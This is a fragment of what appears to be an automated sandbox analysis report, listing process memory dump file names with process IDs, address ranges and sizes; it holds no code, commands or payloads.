memory/3160-214-0x0000000007D00000-0x0000000007D01000-memory.dmp  Filesize 4KB
-
memory/3160-183-0x0000000003090000-0x0000000003091000-memory.dmp  Filesize 4KB
-
memory/3160-185-0x0000000004A40000-0x0000000004A41000-memory.dmp  Filesize 4KB
-
memory/3160-187-0x00000000076A0000-0x00000000076A1000-memory.dmp  Filesize 4KB
-
memory/3160-180-0x0000000000000000-mapping.dmp
-
memory/3160-213-0x0000000007062000-0x0000000007063000-memory.dmp  Filesize 4KB
-
memory/3160-226-0x0000000007EF0000-0x0000000007EF1000-memory.dmp  Filesize 4KB
-
memory/3160-182-0x0000000003090000-0x0000000003091000-memory.dmp  Filesize 4KB
-
memory/3160-186-0x0000000007060000-0x0000000007061000-memory.dmp  Filesize 4KB
-
memory/3160-218-0x0000000007D30000-0x0000000007D31000-memory.dmp  Filesize 4KB
-
memory/3288-174-0x0000000000000000-mapping.dmp
-
memory/3356-189-0x0000000000000000-mapping.dmp
-
memory/3556-175-0x0000000000000000-mapping.dmp
-
memory/3596-179-0x0000000000000000-mapping.dmp
-
memory/3640-340-0x00007FFB93FB0000-0x00007FFB93FB2000-memory.dmp  Filesize 8KB
-
memory/3656-184-0x0000000000000000-mapping.dmp
-
memory/3692-211-0x0000000000960000-0x0000000000961000-memory.dmp  Filesize 4KB
-
memory/3692-230-0x00000000067C2000-0x00000000067C3000-memory.dmp  Filesize 4KB
-
memory/3692-210-0x0000000000000000-mapping.dmp
-
memory/3692-220-0x00000000067C0000-0x00000000067C1000-memory.dmp  Filesize 4KB
-
memory/3692-216-0x0000000000960000-0x0000000000961000-memory.dmp  Filesize 4KB
-
memory/3968-155-0x0000000000000000-mapping.dmp
-
memory/4048-326-0x0000000000000000-mapping.dmp
-
memory/4108-227-0x0000000000000000-mapping.dmp
-
memory/4112-308-0x0000000000000000-mapping.dmp
-
memory/4132-314-0x0000000000000000-mapping.dmp
-
memory/4144-228-0x0000000000000000-mapping.dmp
-
memory/4184-232-0x0000000000000000-mapping.dmp
-
memory/4184-275-0x0000000006A10000-0x0000000006A11000-memory.dmp  Filesize 4KB
-
memory/4184-242-0x0000000000960000-0x0000000000961000-memory.dmp  Filesize 4KB
-
memory/4184-281-0x0000000006A12000-0x0000000006A13000-memory.dmp  Filesize 4KB
-
memory/4200-311-0x0000000000000000-mapping.dmp
-
memory/4300-237-0x0000000000000000-mapping.dmp
-
memory/4384-321-0x0000000000000000-mapping.dmp
-
memory/4448-247-0x0000000000000000-mapping.dmp
-
memory/4468-304-0x0000000000000000-mapping.dmp
-
memory/4568-254-0x0000000000000000-mapping.dmp
-
memory/4576-306-0x0000000000000000-mapping.dmp
-
memory/4624-291-0x0000000004ED0000-0x0000000004ED1000-memory.dmp  Filesize 4KB
-
memory/4624-278-0x0000000004ED2000-0x0000000004ED3000-memory.dmp  Filesize 4KB
-
memory/4624-258-0x0000000000000000-mapping.dmp
-
memory/4644-305-0x0000000000000000-mapping.dmp
-
memory/4668-285-0x0000000006ED0000-0x0000000006ED1000-memory.dmp  Filesize 4KB
-
memory/4668-260-0x0000000000000000-mapping.dmp
-
memory/4668-294-0x0000000006ED2000-0x0000000006ED3000-memory.dmp  Filesize 4KB
-
memory/4732-262-0x0000000000000000-mapping.dmp
-
memory/4740-307-0x0000000000000000-mapping.dmp
-
memory/4760-264-0x0000000000000000-mapping.dmp
-
memory/4816-269-0x0000000000000000-mapping.dmp
-
memory/4820-317-0x0000000000000000-mapping.dmp
-
memory/4876-309-0x0000000000000000-mapping.dmp
-
memory/4892-272-0x0000000000000000-mapping.dmp
-
memory/4904-312-0x0000000000000000-mapping.dmp
-
memory/4908-273-0x0000000000000000-mapping.dmp
-
memory/5016-313-0x0000000000000000-mapping.dmp
-
memory/5088-287-0x0000000000000000-mapping.dmp
-
memory/5112-289-0x0000000000000000-mapping.dmp